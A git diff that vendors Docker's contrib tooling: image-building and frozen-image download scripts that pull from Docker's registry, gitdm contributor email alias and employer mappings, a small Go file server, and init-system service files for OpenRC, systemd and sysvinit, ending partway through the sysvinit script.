+    base_image_mounts="${base_image_mounts}:$builddir/base/$image_id/layer=ro+wh"
+    image_id=$(docker inspect -f "{{.Parent}}" "$image_id")
+  done
+fi
+
+# Mount work directory
+mount -t aufs -o "br=$builddir/diff=rw${base_image_mounts},dio,xino=/dev/shm/aufs.xino" none "$builddir/workdir"
+
+# Update files
+cd $builddir
+LC_ALL=C diff -rq disk_image workdir \
+  | sed -re "s|Only in workdir(.*?): |DEL \1/|g;s|Only in disk_image(.*?): |ADD \1/|g;s|Files disk_image/(.+) and workdir/(.+) differ|UPDATE /\1|g" \
+  | while read action entry; do
+      case "$action" in
+        ADD|UPDATE)
+          cp -a "disk_image$entry" "workdir$entry"
+          ;;
+        DEL)
+          rm -rf "workdir$entry"
+          ;;
+        *)
+          echo "Error: unknown diff line: $action $entry" >&2
+          ;;
+      esac
+    done
+
+# Pack new image
+new_image_id="$(for i in $(seq 1 32); do printf "%02x" $(($RANDOM % 256)); done)"
+mkdir -p $builddir/result/$new_image_id
+cd diff
+tar -cf $builddir/result/$new_image_id/layer.tar *
+echo "1.0" > $builddir/result/$new_image_id/VERSION
+cat > $builddir/result/$new_image_id/json <<-EOS
+{ "docker_version": "1.4.1"
+, "id": "$new_image_id"
+, "created": "$(date -u +%Y-%m-%dT%H:%M:%S.%NZ)"
+EOS
+
+if [ -n "$docker_base_image" ]; then
+  image_id=$(docker inspect -f "{{.Id}}" "$docker_base_image")
+  echo ", \"parent\": \"$image_id\"" >> $builddir/result/$new_image_id/json
+fi
+
+echo "}" >> $builddir/result/$new_image_id/json
+
+echo "{\"$image_name\":{\"$image_tag\":\"$new_image_id\"}}" > $builddir/result/repositories
+
+cd $builddir/result
+
+# mkdir -p $CURDIR/$image_name
+# cp -r * $CURDIR/$image_name
+tar -c * | docker load
diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh
new file mode 100755
index 0000000000..29d7ff59fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh
@@ -0,0 +1,108 @@
+#!/bin/bash
+set -e
+
+# hello-world                      latest              ef872312fe1b        3 months ago        910 B
+# hello-world                      latest              ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9   3 months ago        910 B
+
+# debian                           latest              f6fab3b798be        10 weeks ago        85.1 MB
+# debian                           latest              f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd   10 weeks ago        85.1 MB
+
+if ! command -v curl &> /dev/null; then
+	echo >&2 'error: "curl" not found!'
+	exit 1
+fi
+
+usage() {
+	echo "usage: $0 dir image[:tag][@image-id] ..."
+	echo "   ie: $0 /tmp/hello-world hello-world"
+	echo "       $0 /tmp/debian-jessie debian:jessie"
+	echo "       $0 /tmp/old-hello-world hello-world@ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9"
+	echo "       $0 /tmp/old-debian debian:latest@f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd"
+	[ -z "$1" ] || exit "$1"
+}
+
+dir="$1" # dir for building tar in
+shift || usage 1 >&2
+
+[ $# -gt 0 -a "$dir" ] || usage 2 >&2
+mkdir -p "$dir"
+
+# hacky workarounds for Bash 3 support (no associative arrays)
+images=()
+rm -f "$dir"/tags-*.tmp
+# repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."'
+
+while [ $# -gt 0 ]; do
+	imageTag="$1"
+	shift
+	image="${imageTag%%[:@]*}"
+	tag="${imageTag#*:}"
+	imageId="${tag##*@}"
+	[ "$imageId" != "$tag" ] || imageId=
+	[ "$tag" != "$imageTag" ] || tag='latest'
+	tag="${tag%@*}"
+
+	imageFile="${image//\//_}" # "/" can't be in filenames :)
+
+	token="$(curl -sSL -o /dev/null -D- -H 'X-Docker-Token: true' "https://index.docker.io/v1/repositories/$image/images" | tr -d '\r' | awk -F ': *' '$1 == "X-Docker-Token" { print $2 }')"
+
+	if [ -z "$imageId" ]; then
+		imageId="$(curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/repositories/$image/tags/$tag")"
+		imageId="${imageId//\"/}"
+	fi
+
+	ancestryJson="$(curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/ancestry")"
+	if [ "${ancestryJson:0:1}" != '[' ]; then
+		echo >&2 "error: /v1/images/$imageId/ancestry returned something unexpected:"
+		echo >&2 "  $ancestryJson"
+		exit 1
+	fi
+
+	IFS=','
+	ancestry=( ${ancestryJson//[\[\] \"]/} )
+	unset IFS
+
+	if [ -s "$dir/tags-$imageFile.tmp" ]; then
+		echo -n ', ' >> "$dir/tags-$imageFile.tmp"
+	else
+		images=( "${images[@]}" "$image" )
+	fi
+	echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp"
+
+	echo "Downloading '$imageTag' (${#ancestry[@]} layers)..."
+	for imageId in "${ancestry[@]}"; do
+		mkdir -p "$dir/$imageId"
+		echo '1.0' > "$dir/$imageId/VERSION"
+
+		curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/json" -o "$dir/$imageId/json"
+
+		# TODO figure out why "-C -" doesn't work here
+		# "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume."
+		# "HTTP/1.1 416 Requested Range Not Satisfiable"
+		if [ -f "$dir/$imageId/layer.tar" ]; then
+			# TODO hackpatch for no -C support :'(
+			echo "skipping existing ${imageId:0:12}"
+			continue
+		fi
+		curl -SL --progress -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/layer" -o "$dir/$imageId/layer.tar" # -C -
+	done
+	echo
+done
+
+echo -n '{' > "$dir/repositories"
+firstImage=1
+for image in "${images[@]}"; do
+	imageFile="${image//\//_}" # "/" can't be in filenames :)
+
+	[ "$firstImage" ] || echo -n ',' >> "$dir/repositories"
+	firstImage=
+	echo -n $'\n\t' >> "$dir/repositories"
+	echo -n '"'"$image"'": { '"$(cat "$dir/tags-$imageFile.tmp")"' }' >> "$dir/repositories"
+done
+echo -n $'\n}\n' >> "$dir/repositories"
+
+rm -f "$dir"/tags-*.tmp
+
+echo "Download of images into '$dir' complete."
+echo "Use something like the following to load the result into a Docker daemon:"
+echo "  tar -cC '$dir' . | docker load"
diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh
new file mode 100755
index 0000000000..111e3fa2ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh
@@ -0,0 +1,121 @@
+#!/bin/bash
+set -e
+
+# hello-world                      latest              ef872312fe1b        3 months ago        910 B
+# hello-world                      latest              ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9   3 months ago        910 B
+
+# debian                           latest              f6fab3b798be        10 weeks ago        85.1 MB
+# debian                           latest              f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd   10 weeks ago        85.1 MB
+
+if ! command -v curl &> /dev/null; then
+	echo >&2 'error: "curl" not found!'
+	exit 1
+fi
+
+usage() {
+	echo "usage: $0 dir image[:tag][@digest] ..."
+	echo "       $0 /tmp/old-hello-world hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7"
+	[ -z "$1" ] || exit "$1"
+}
+
+dir="$1" # dir for building tar in
+shift || usage 1 >&2
+
+[ $# -gt 0 -a "$dir" ] || usage 2 >&2
+mkdir -p "$dir"
+
+# hacky workarounds for Bash 3 support (no associative arrays)
+images=()
+rm -f "$dir"/tags-*.tmp
+# repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."'
+
+while [ $# -gt 0 ]; do
+	imageTag="$1"
+	shift
+	image="${imageTag%%[:@]*}"
+	imageTag="${imageTag#*:}"
+	digest="${imageTag##*@}"
+	tag="${imageTag%%@*}"
+
+	# add prefix library if passed official image
+	if [[ "$image" != *"/"* ]]; then
+		image="library/$image"
+	fi
+
+	imageFile="${image//\//_}" # "/" can't be in filenames :)
+
+	token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)"
+
+	manifestJson="$(curl -sSL -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/manifests/$digest")"
+	if [ "${manifestJson:0:1}" != '{' ]; then
+		echo >&2 "error: /v2/$image/manifests/$digest returned something unexpected:"
+		echo >&2 "  $manifestJson"
+		exit 1
+	fi
+
+	layersFs=$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum')
+
+	IFS=$'\n'
+	# bash v4 on Windows CI requires CRLF separator
+	if [ "$(go env GOHOSTOS)" = 'windows' ]; then
+		major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1)
+		if [ "$major" -ge 4 ]; then
+			IFS=$'\r\n'
+		fi
+	fi
+	layers=( ${layersFs} )
+	unset IFS
+
+	history=$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]')
+	imageId=$(echo "$history" | jq --raw-output .[0] | jq --raw-output .id)
+
+	if [ -s "$dir/tags-$imageFile.tmp" ]; then
+		echo -n ', ' >> "$dir/tags-$imageFile.tmp"
+	else
+		images=( "${images[@]}" "$image" )
+	fi
+	echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp"
+
+	echo "Downloading '${image}:${tag}@${digest}' (${#layers[@]} layers)..."
+	for i in "${!layers[@]}"; do
+		imageJson=$(echo "$history" | jq --raw-output .[${i}])
+		imageId=$(echo "$imageJson" | jq --raw-output .id)
+		imageLayer=${layers[$i]}
+
+		mkdir -p "$dir/$imageId"
+		echo '1.0' > "$dir/$imageId/VERSION"
+
+		echo "$imageJson" > "$dir/$imageId/json"
+
+		# TODO figure out why "-C -" doesn't work here
+		# "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume."
+		# "HTTP/1.1 416 Requested Range Not Satisfiable"
+		if [ -f "$dir/$imageId/layer.tar" ]; then
+			# TODO hackpatch for no -C support :'(
+			echo "skipping existing ${imageId:0:12}"
+			continue
+		fi
+		token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)"
+		curl -SL --progress -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/blobs/$imageLayer" -o "$dir/$imageId/layer.tar" # -C -
+	done
+	echo
+done
+
+echo -n '{' > "$dir/repositories"
+firstImage=1
+for image in "${images[@]}"; do
+	imageFile="${image//\//_}" # "/" can't be in filenames :)
+	image="${image#library\/}"
+
+	[ "$firstImage" ] || echo -n ',' >> "$dir/repositories"
+	firstImage=
+	echo -n $'\n\t' >> "$dir/repositories"
+	echo -n '"'"$image"'": { '"$(cat "$dir/tags-$imageFile.tmp")"' }' >> "$dir/repositories"
+done
+echo -n $'\n}\n' >> "$dir/repositories"
+
+rm -f "$dir"/tags-*.tmp
+
+echo "Download of images into '$dir' complete."
+echo "Use something like the following to load the result into a Docker daemon:"
+echo "  tar -cC '$dir' . | docker load"
diff --git a/vendor/github.com/docker/docker/contrib/editorconfig b/vendor/github.com/docker/docker/contrib/editorconfig
new file mode 100644
index 0000000000..97eda89a4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/editorconfig
@@ -0,0 +1,13 @@
+root = true
+
+[*]
+end_of_line = lf
+insert_final_newline = true
+charset = utf-8
+indent_style = tab
+indent_size = 4
+trim_trailing_whitespace = true
+
+[*.md]
+indent_size = 2
+indent_style = space
diff --git a/vendor/github.com/docker/docker/contrib/gitdm/aliases b/vendor/github.com/docker/docker/contrib/gitdm/aliases
new file mode 100644
index 0000000000..dd5dd34335
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/gitdm/aliases
@@ -0,0 +1,148 @@
+Danny.Yates@mailonline.co.uk danny@codeaholics.org
+KenCochrane@gmail.com kencochrane@gmail.com
+LÉVEIL thomasleveil@gmail.com
+Vincent.Bernat@exoscale.ch bernat@luffy.cx
+acidburn@docker.com jess@docker.com
+admin@jtlebi.fr jt@yadutaf.fr
+ahmetalpbalkan@gmail.com ahmetb@microsoft.com
+aj@gandi.net aj@gandi.net
+albers@users.noreply.github.com github@albersweb.de
+alexander.larsson@gmail.com alexl@redhat.com
+amurdaca@redhat.com antonio.murdaca@gmail.com
+amy@gandi.net aj@gandi.net
+andrew.weiss@microsoft.com andrew.weiss@outlook.com
+angt@users.noreply.github.com adrien@gallouet.fr
+ankushagarwal@users.noreply.github.com ankushagarwal11@gmail.com
+anonymouse2048@gmail.com lheckemann@twig-world.com
+anusha@docker.com anusha.ragunathan@docker.com
+asarai@suse.com asarai@suse.de
+avi.miller@gmail.com avi.miller@oracle.com
+bernat@luffy.cx Vincent.Bernat@exoscale.ch
+bgoff@cpuguy83-mbp.home cpuguy83@gmail.com
+brandon@ifup.co brandon@ifup.org
+brent@docker.com brent.salisbury@docker.com
+charmes.guillaume@gmail.com guillaume.charmes@docker.com
+chenchun.feed@gmail.com ramichen@tencent.com
+chooper@plumata.com charles.hooper@dotcloud.com
+crosby.michael@gmail.com michael@docker.com
+crosbymichael@gmail.com michael@docker.com
+cyphar@cyphar.com asarai@suse.de
+daehyeok@daehyeok-ui-MacBook-Air.local daehyeok@gmail.com
+daehyeok@daehyeokui-MacBook-Air.local daehyeok@gmail.com
+daniel.norberg@gmail.com dano@spotify.com
+daniel@dotcloud.com daniel.mizyrycki@dotcloud.com
+darren@rancher.com darren.s.shepherd@gmail.com
+dave@dtucker.co.uk dt@docker.com
+dev@vvieux.com victor.vieux@docker.com
+dgasienica@zynga.com daniel@gasienica.ch
+dnephin@gmail.com dnephin@docker.com
+dominikh@fork-bomb.org dominik@honnef.co
+dqminh89@gmail.com dqminh@cloudflare.com
+dsxiao@dataman-inc.com dxiao@redhat.com
+duglin@users.noreply.github.com dug@us.ibm.com
+eric.hanchrow@gmail.com ehanchrow@ine.com
+erik+github@hollensbe.org github@hollensbe.org
+estesp@gmail.com estesp@linux.vnet.ibm.com
+ewindisch@docker.com eric@windisch.us
+f.joffrey@gmail.com joffrey@docker.com
+fkautz@alumni.cmu.edu fkautz@redhat.com
+frank.rosquin@gmail.com frank.rosquin+github@gmail.com
+gh@mattyw.net mattyw@me.com
+git@julienbordellier.com julienbordellier@gmail.com
+github@metaliveblog.com github@developersupport.net
+github@srid.name sridharr@activestate.com
+guillaume.charmes@dotcloud.com guillaume.charmes@docker.com
+guillaume@charmes.net guillaume.charmes@docker.com
+guillaume@docker.com guillaume.charmes@docker.com
+guillaume@dotcloud.com guillaume.charmes@docker.com
+haoshuwei24@gmail.com haosw@cn.ibm.com
+hollie.teal@docker.com hollie@docker.com
+hollietealok@users.noreply.github.com hollie@docker.com
+hsinko@users.noreply.github.com 21551195@zju.edu.cn
+iamironbob@gmail.com altsysrq@gmail.com
+icecrime@gmail.com arnaud.porterie@docker.com
+jatzen@gmail.com jacob@jacobatzen.dk
+jeff@allingeek.com jeff.nickoloff@gmail.com
+jefferya@programmerq.net jeff@docker.com
+jerome.petazzoni@dotcloud.com jerome.petazzoni@dotcloud.com
+jfrazelle@users.noreply.github.com jess@docker.com
+jhoward@microsoft.com John.Howard@microsoft.com
+jlhawn@berkeley.edu josh.hawn@docker.com
+joffrey@dotcloud.com joffrey@docker.com
+john.howard@microsoft.com John.Howard@microsoft.com
+jp@enix.org jerome.petazzoni@dotcloud.com
+justin.cormack@unikernel.com justin.cormack@docker.com
+justin.simonelis@PTS-JSIMON2.toronto.exclamation.com justin.p.simonelis@gmail.com
+justin@specialbusservice.com justin.cormack@docker.com
+katsuta_soshi@cyberagent.co.jp soshi.katsuta@gmail.com
+kuehnle@online.de git.nivoc@neverbox.com
+kwk@users.noreply.github.com konrad.wilhelm.kleine@gmail.com
+leijitang@gmail.com leijitang@huawei.com
+liubin0329@gmail.com liubin0329@users.noreply.github.com
+lk4d4math@gmail.com lk4d4@docker.com
+louis@dotcloud.com kalessin@kalessin.fr
+lsm5@redhat.com lsm5@fedoraproject.org
+lyndaoleary@hotmail.com lyndaoleary29@gmail.com
+madhu@socketplane.io madhu@docker.com
+martins@noironetworks.com aanm90@gmail.com
+mary@docker.com mary.anthony@docker.com
+mastahyeti@users.noreply.github.com mastahyeti@gmail.com
+maztaim@users.noreply.github.com taim@bosboot.org
+me@runcom.ninja antonio.murdaca@gmail.com
+mheon@mheonlaptop.redhat.com mheon@redhat.com
+michael@crosbymichael.com michael@docker.com
+mohitsoni1989@gmail.com mosoni@ebay.com
+moxieandmore@gmail.com mary.anthony@docker.com
+moyses.furtado@wplex.com.br moysesb@gmail.com
+msabramo@gmail.com marc@marc-abramowitz.com
+mzdaniel@glidelink.net daniel.mizyrycki@dotcloud.com
+nathan.leclaire@gmail.com nathan.leclaire@docker.com
+nathanleclaire@gmail.com nathan.leclaire@docker.com
+ostezer@users.noreply.github.com ostezer@gmail.com
+peter@scraperwiki.com p@pwaller.net
+princess@docker.com jess@docker.com
+proppy@aminche.com proppy@google.com
+qhuang@10.0.2.15 h.huangqiang@huawei.com
+resouer@gmail.com resouer@163.com
+roberto_hashioka@hotmail.com roberto.hashioka@docker.com
+root@vagrant-ubuntu-12.10.vagrantup.com daniel.mizyrycki@dotcloud.com
+runcom@linux.com antonio.murdaca@gmail.com
+runcom@redhat.com antonio.murdaca@gmail.com
+runcom@users.noreply.github.com antonio.murdaca@gmail.com
+s@docker.com solomon@docker.com
+shawnlandden@gmail.com shawn@churchofgit.com
+singh.gurjeet@gmail.com gurjeet@singh.im
+sjoerd@byte.nl sjoerd-github@linuxonly.nl
+smahajan@redhat.com shishir.mahajan@redhat.com
+solomon.hykes@dotcloud.com solomon@docker.com
+solomon@dotcloud.com solomon@docker.com
+stefanb@us.ibm.com stefanb@linux.vnet.ibm.com
+stevvooe@users.noreply.github.com stephen.day@docker.com
+superbaloo+registrations.github@superbaloo.net baloo@gandi.net
+tangicolin@gmail.com tangicolin@gmail.com
+thaJeztah@users.noreply.github.com github@gone.nl
+thatcher@dotcloud.com thatcher@docker.com
+thatcher@gmx.net thatcher@docker.com
+tibor@docker.com teabee89@gmail.com
+tiborvass@users.noreply.github.com teabee89@gmail.com
+timruffles@googlemail.com oi@truffles.me.uk
+tintypemolly@Ohui-MacBook-Pro.local tintypemolly@gmail.com
+tj@init.me tejesh.mehta@gmail.com
+tristan.carel@gmail.com tristan@cogniteev.com
+unclejack@users.noreply.github.com cristian.staretu@gmail.com
+unclejacksons@gmail.com cristian.staretu@gmail.com
+vbatts@hashbangbash.com vbatts@redhat.com
+victor.vieux@dotcloud.com victor.vieux@docker.com
+victor@docker.com victor.vieux@docker.com
+victor@dotcloud.com victor.vieux@docker.com
+victorvieux@gmail.com victor.vieux@docker.com
+vieux@docker.com victor.vieux@docker.com
+vincent+github@demeester.fr vincent@sbr.pm
+vincent@bernat.im bernat@luffy.cx
+vojnovski@gmail.com viktor.vojnovski@amadeus.com
+whoshuu@gmail.com huu@prismskylabs.com
+xiaods@gmail.com dxiao@redhat.com
+xlgao@zju.edu.cn xlgao@zju.edu.cn
+yestin.sun@polyera.com sunyi0804@gmail.com
+yuchangchun1@huawei.com yuchangchun1@huawei.com
+zjaffee@us.ibm.com zij@case.edu
diff --git a/vendor/github.com/docker/docker/contrib/gitdm/domain-map b/vendor/github.com/docker/docker/contrib/gitdm/domain-map
new file mode 100644
index 0000000000..1f1849e4f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/gitdm/domain-map
@@ -0,0 +1,39 @@
+#
+# Docker
+#
+
+docker.com                      Docker
+dotcloud.com                    Docker
+
+aluzzardi@gmail.com             Docker
+cpuguy83@gmail.com              Docker
+derek@mcgstyle.net              Docker
+github@gone.nl                  Docker
+kencochrane@gmail.com           Docker
+mickael.laventure@gmail.com     Docker
+sam.alba@gmail.com              Docker
+svendowideit@fosiki.com         Docker
+svendowideit@home.org.au        Docker
+tonistiigi@gmail.com            Docker
+
+cristian.staretu@gmail.com      Docker      < 2015-01-01
+cristian.staretu@gmail.com      Cisco
+
+github@hollensbe.org            Docker      < 2015-01-01
+github@hollensbe.org            Cisco
+
+david.calavera@gmail.com        Docker      < 2016-04-01
+david.calavera@gmail.com        Netlify
+
+#
+# Others
+#
+
+cisco.com                       Cisco
+google.com                      Google
+ibm.com                         IBM
+huawei.com                      Huawei
+microsoft.com                   Microsoft
+
+redhat.com                      Red Hat
+mrunalp@gmail.com               Red Hat
diff --git a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh
new file mode 100755
index 0000000000..dd6a564995
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+#
+# This script generates a gitdm compatible email aliases file from a git
+# formatted .mailmap file.
+#
+# Usage:
+#  $> ./generate_aliases <mailmap_file> > aliases
+#
+
+cat $1 | \
+    grep -v '^#' | \
+    sed 's/^[^<]*<\([^>]*\)>/\1/' | \
+    grep '<.*>' | sed -e 's/[<>]/ /g' | \
+    awk '{if ($3 != "") { print $3" "$1 } else {print $2" "$1}}' | \
+    sort | uniq
diff --git a/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config b/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config
new file mode 100644
index 0000000000..d9b62b0b43
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/gitdm/gitdm.config
@@ -0,0 +1,17 @@
+#
+# EmailAliases lets us cope with developers who use more
+# than one address.
+#
+EmailAliases aliases
+
+#
+# EmailMap does the main work of mapping addresses onto 
+# employers.
+#
+EmailMap domain-map
+
+#
+# Use GroupMap to map a file full of addresses to the 
+# same employer
+#
+# GroupMap company-Docker  Docker
diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile
new file mode 100644
index 0000000000..747dc91bcf
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile
@@ -0,0 +1,4 @@
+FROM busybox
+EXPOSE 80/tcp
+COPY httpserver .
+CMD ["./httpserver"]
diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris
new file mode 100644
index 0000000000..3d0d691c17
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris
@@ -0,0 +1,4 @@
+FROM solaris
+EXPOSE 80/tcp
+COPY httpserver .
+CMD ["./httpserver"]
diff --git a/vendor/github.com/docker/docker/contrib/httpserver/server.go b/vendor/github.com/docker/docker/contrib/httpserver/server.go
new file mode 100644
index 0000000000..a75d5abb3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/httpserver/server.go
@@ -0,0 +1,12 @@
+package main
+
+import (
+	"log"
+	"net/http"
+)
+
+func main() {
+	fs := http.FileServer(http.Dir("/static"))
+	http.Handle("/", fs)
+	log.Panic(http.ListenAndServe(":80", nil))
+}
diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd
new file mode 100644
index 0000000000..244403113e
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.confd
@@ -0,0 +1,13 @@
+# /etc/conf.d/docker: config file for /etc/init.d/docker
+
+# where the docker daemon output gets piped
+#DOCKER_LOGFILE="/var/log/docker.log"
+
+# where docker's pid get stored
+#DOCKER_PIDFILE="/run/docker.pid"
+
+# where the docker daemon itself is run from
+#DOCKERD_BINARY="/usr/bin/dockerd"
+
+# any other random options you want to pass to docker
+DOCKER_OPTS=""
diff --git a/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd
new file mode 100644
index 0000000000..5d3160338a
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/openrc/docker.initd
@@ -0,0 +1,22 @@
+#!/sbin/openrc-run
+# Copyright 1999-2013 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+
+command="${DOCKERD_BINARY:-/usr/bin/dockerd}"
+pidfile="${DOCKER_PIDFILE:-/run/${RC_SVCNAME}.pid}"
+command_args="-p \"${pidfile}\" ${DOCKER_OPTS}"
+DOCKER_LOGFILE="${DOCKER_LOGFILE:-/var/log/${RC_SVCNAME}.log}"
+start_stop_daemon_args="--background \
+	--stderr \"${DOCKER_LOGFILE}\" --stdout \"${DOCKER_LOGFILE}\""
+
+start_pre() {
+	checkpath -f -m 0644 -o root:docker "$DOCKER_LOGFILE"
+
+	ulimit -n 1048576
+
+	# Having non-zero limits causes performance problems due to accounting overhead
+	# in the kernel. We recommend using cgroups to do container-local accounting.
+	ulimit -u unlimited
+
+	return 0
+}
diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS b/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS
new file mode 100644
index 0000000000..b9ba55b3fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS
@@ -0,0 +1,3 @@
+Lokesh Mandvekar <lsm5@fedoraproject.org> (@lsm5)
+Brandon Philips <brandon.philips@coreos.com> (@philips)
+Jessie Frazelle <jess@docker.com> (@jfrazelle)
diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service
new file mode 100644
index 0000000000..8bfed93c75
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service
@@ -0,0 +1,29 @@
+[Unit]
+Description=Docker Application Container Engine
+Documentation=https://docs.docker.com
+After=network.target docker.socket firewalld.service
+Requires=docker.socket
+
+[Service]
+Type=notify
+# the default is not to use systemd for cgroups because the delegate issues still
+# exists and systemd currently does not support the cgroup feature set required
+# for containers run by docker
+ExecStart=/usr/bin/dockerd -H fd://
+ExecReload=/bin/kill -s HUP $MAINPID
+LimitNOFILE=1048576
+# Having non-zero Limit*s causes performance problems due to accounting overhead
+# in the kernel. We recommend using cgroups to do container-local accounting.
+LimitNPROC=infinity
+LimitCORE=infinity
+# Uncomment TasksMax if your systemd version supports it.
+# Only systemd 226 and above support this version.
+#TasksMax=infinity
+TimeoutStartSec=0
+# set delegate yes so that systemd does not reset the cgroups of docker containers
+Delegate=yes
+# kill only the docker process, not all processes in the cgroup
+KillMode=process
+
+[Install]
+WantedBy=multi-user.target
diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm
new file mode 100644
index 0000000000..6e41892399
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm
@@ -0,0 +1,28 @@
+[Unit]
+Description=Docker Application Container Engine
+Documentation=https://docs.docker.com
+After=network.target firewalld.service
+
+[Service]
+Type=notify
+# the default is not to use systemd for cgroups because the delegate issues still
+# exists and systemd currently does not support the cgroup feature set required
+# for containers run by docker
+ExecStart=/usr/bin/dockerd
+ExecReload=/bin/kill -s HUP $MAINPID
+# Having non-zero Limit*s causes performance problems due to accounting overhead
+# in the kernel. We recommend using cgroups to do container-local accounting.
+LimitNOFILE=infinity
+LimitNPROC=infinity
+LimitCORE=infinity
+# Uncomment TasksMax if your systemd version supports it.
+# Only systemd 226 and above support this version.
+#TasksMax=infinity
+TimeoutStartSec=0
+# set delegate yes so that systemd does not reset the cgroups of docker containers
+Delegate=yes
+# kill only the docker process, not all processes in the cgroup
+KillMode=process
+
+[Install]
+WantedBy=multi-user.target
diff --git a/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket b/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket
new file mode 100644
index 0000000000..7dd95098e4
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/systemd/docker.socket
@@ -0,0 +1,12 @@
+[Unit]
+Description=Docker Socket for the API
+PartOf=docker.service
+
+[Socket]
+ListenStream=/var/run/docker.sock
+SocketMode=0660
+SocketUser=root
+SocketGroup=docker
+
+[Install]
+WantedBy=sockets.target
diff --git a/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker
new file mode 100755
index 0000000000..4f9d38dda5
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker
@@ -0,0 +1,152 @@
+#!/bin/sh
+set -e
+
+### BEGIN INIT INFO
+# Provides:           docker
+# Required-Start:     $syslog $remote_fs
+# Required-Stop:      $syslog $remote_fs
+# Should-Start:       cgroupfs-mount cgroup-lite
+# Should-Stop:        cgroupfs-mount cgroup-lite
+# Default-Start:      2 3 4 5
+# Default-Stop:       0 1 6
+# Short-Description:  Create lightweight, portable, self-sufficient containers.
+# Description:
+#  Docker is an open-source project to easily create lightweight, portable,
+#  self-sufficient containers from any application. The same container that a
+#  developer builds and tests on a laptop can run at scale, in production, on
+#  VMs, bare metal, OpenStack clusters, public clouds and more.
+### END INIT INFO
+
+export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin
+
+BASE=docker
+
+# modify these in /etc/default/$BASE (/etc/default/docker)
+DOCKERD=/usr/bin/dockerd
+# This is the pid file managed by docker itself
+DOCKER_PIDFILE=/var/run/$BASE.pid
+# This is the pid file created/managed by start-stop-daemon
+DOCKER_SSD_PIDFILE=/var/run/$BASE-ssd.pid
+DOCKER_LOGFILE=/var/log/$BASE.log
+DOCKER_OPTS=
+DOCKER_DESC="Docker"
+
+# Get lsb functions
+. /lib/lsb/init-functions
